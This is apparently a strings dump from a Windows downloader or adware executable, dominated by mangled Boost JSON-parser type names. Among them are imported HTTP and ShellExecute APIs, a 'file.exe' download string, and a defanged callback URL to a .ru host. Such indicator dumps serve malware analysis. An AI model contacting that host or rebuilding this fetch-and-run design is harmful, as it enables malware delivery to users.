.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@Ua_name@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$chlit@D@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$sequence@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_s@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$alternative@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$list_parser@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@U?$chlit@D@234@Uno_list_endtoken@234@Uplain_parser_category@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$alternative@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@V1234@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Uend_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@

.?AV?$sp_counted_impl_p@U?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@@detail@boost@@

.PA_W

KERNEL32.DLL

mscoree.dll

wininet.dll

kernel32.dll

user32.dll

shell32.dll

advapi32.dll

comctl32.dll

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

https

Error getting HTTP status #

Error HTTP status

wrong file url

e:Zone.Identifier

empty download url

file.exe

banner_url

Shell32.dll

SOFTWARE\Microsoft\Windows\CurrentVersion

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_CURRENT_CONFIG

windows

c:\%original file name%.exe

21007759360

%original file name%.exe_2788:

.text

.rsrc

@.idata

@.zsyh

@.tcn

@.ceie

^uel32.dll

%sss//s

<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

KERNEL32.DLL

CreatePipe

USER32.DLL

SetKeyboardState

GDI32.DLL

%original file name%.exe_2788_rwx_00413000_00002000:

^uel32.dll

%original file name%.exe_2788_rwx_05000000_0006B000:

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

j.XjDY

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

HttpOpenRequestW

HttpSendRequestW

HttpQueryInfoW

ShellExecuteW

QueryInterface(IWebBrowser) failed

url error in "

\VBOXSVR\shared\boost\boost/property_tree/detail/ptree_implementation.hpp

\VBOXSVR\shared\boost\boost/property_tree/detail/json_parser_read.hpp

\VBOXSVR\shared\boost\boost/property_tree/string_path.hpp

SetProcessShutdownParameters

CreatePipe

KERNEL32.dll

USER32.dll

GDI32.dll

GdiplusShutdown

gdiplus.dll

PathCreateFromUrlW

SHLWAPI.dll

COMDLG32.dll

RegOpenKeyExW

RegCloseKey

RegCreateKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

WININET.dll

POWRPROF.dll

VERSION.dll

PSAPI.DLL

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

zcÁ

hXXp://forces.prochristmasdom.ru/get_json?stb=1&did=1497824015&ext_partner_id=&file_id=32888998

.?AU?$concrete_parser@U?$alternative@V?$action@V?$chset@_W@classic@spirit@boost@@Ua_escape@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@V?$action@U?$uint_parser@K$0BA@$03$03@classic@spirit@boost@@Ua_unicode@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$alternative@V?$action@U?$difference@U?$difference@Uanychar_parser@classic@spirit@boost@@V?$strlit@PBD@234@@classic@spirit@boost@@V?$strlit@PBD@234@@classic@spirit@boost@@Ua_char@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$positive@U?$contiguous@U?$confix_parser@U?$chlit@D@classic@spirit@boost@@U?$kleene_star@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@U1234@Uunary_parser_category@234@Unon_nested@234@Unon_lexeme@234@@classic@spirit@boost@@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$sequence@U?$optional@U?$chlit@D@classic@spirit@boost@@@classic@spirit@boost@@U?$alternative@U?$chlit@D@classic@spirit@boost@@U?$sequence@U?$range@_W@classic@spirit@boost@@U?$kleene_star@Udigit_parser@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$sequence@V?$chset@_W@classic@spirit@boost@@U?$optional@V?$chset@_W@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@Ua_name@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$chlit@D@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

